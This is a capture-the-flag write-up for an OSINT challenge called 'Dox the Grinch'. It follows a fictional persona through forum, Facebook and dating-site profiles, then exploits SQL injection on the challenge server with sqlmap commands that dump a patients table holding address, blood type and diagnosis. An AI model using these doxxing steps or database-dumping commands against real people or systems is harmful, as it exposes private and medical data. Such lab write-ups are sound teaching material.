Dox the Grinch
Authors: Milkdrop, PinkiePie1189
(OSINT Challenge) aka (Open-source intelligence Challenge)
Description of Challenge:
Here a Guy posted the he hate s Christmas and now we need to find his name, Surname, City, Favorite Color, Blood Type and his height (which is respectively the flag for the ctf)
Lets start by following the URL
https://notabug.io/t/whatever/comments/44530e6b7740f22940db9c176b621900d0bce697/i-hate-xmas
Here you can see a post
it was Posted by a user : Domay1986
now lets click on the username and see what else has he posted Or Submitted in this case
here you can see he has another post about HackerNews
lets follow the post, you can see
Hmmm
he made a HackerNews account so lets go to google and search HackerNews
Lets go to
We can see a lot of post there
Now how can we find this guy?
first I clicked on a user name of a random user
Doppp for an instance
it redirected to https://news.ycombinator.com/user?id=doppp
Then I replaced the id with Domay1986 which was the poster and the person we were supposed to find
https://news.ycombinator.com/user?id=Domay1986
Cool we found the User
here we can see his name is Eugene
Now, we got his name where do we get other stuffs???
on overview you can see a post
He mentioned that he has a Facebook account
now lets search for his Facebook account
I gave a lot of try but the one that worked for me was
searching with Eugene (domay)
why Eugene (domay)
Eugene was his first name and in this case Domay1986 was his alliance so in facebook if you search for a person who has a nickname too you use () brackets and put in the nickname for the person
Put it in the search bar,
Then search for the person, there you go you found the guy
Lets check his posts,
Eugene Clarke is his full name.
now lets look for all his posts
Scrolling down you will see a post
hmm lets check the website we could get more info about him
here it redirects you to http://challs.xmas.htsp.ro:13002/23c12189dcu91n8uc198231c9n412c4189dsa/?fbclid=IwAR3cBJGwGQMAyyDWDHSiI1LTTqKlt-r1JI6E-tdVrULRbK3G-lUtTlXDKsM
A database huh lets try sql injection here
type in ' in the search bar and hit search
Boom its SQLINJECTABLE
now lets use SQLMAP to take out the DBS
i used the command
sqlmap -u "http://challs.xmas.htsp.ro:13002/23c12189dcu91n8uc198231c9n412c4189dsa/?id=" --dbs
it resulted with 2 tables
Now lets check the ctf table
lets see what the database ctf holds
using the command
sqlmap -u "http://challs.xmas.htsp.ro:13002/23c12189dcu91n8uc198231c9n412c4189dsa/?id=" -D ctf --tables
Now lets see all the data in the patients table
running
sqlmap -u "http://challs.xmas.htsp.ro:13002/23c12189dcu91n8uc198231c9n412c4189dsa/?id=" -D ctf -T patients --dump
you get
Since SQLMAP trims the data to see the data you need to go to
now
lets go to /root/.sqlmap/output/challs.xmas.htsp.ro/dump/ctf
you can see a csv file
now lets open that file I will use Text Editor for Kali linux
you can see a lot of data load
Now lets search for the name Eugene
here you go
2107,qxcxdoxmes62pwn5,EUGENE,Caucasian,M,162,110,2207 Kelly Ave PA 18508,CLARKE,1 April 1986,0-,Grinch Syndrome
For better view you can copy his patient ID qxcxdoxmes62pwn5 and search it in the website,
now we got his Name,Surname,Blood Type, Body Height
now all we need is his city and his favorite color.
for his city lets copy the address 2207 Kelly Ave PA 18508 and google the address
So the city is Scranton
now the only thing left to look for is his favorite color
lets go back to his facebook post and look at his latest post
lets maximize the image
you can see
Different tabs open in which Matrimoniale is one
lets search for that
since he has talked about romanian girls in his account, lets go to
for finding a user, the website uses https://www.matrimoniale.ro/thepersons name so lets search for domay1986
lets go to the url
https://www.matrimoniale.ro/domay1986
you will see
looking through all the tab i found Personal intresting lets go to that tab,
you can see
(scroll down a bit)
now we have all the information we need
Name: Eugene
Surname :Clarke
City: Scranton
Color: magenta
blood group: 0-
height: 162
combining and getting the flag as:
X-MAS{eugene_clarke_scranton_magenta_0-_162}
Top comments (0)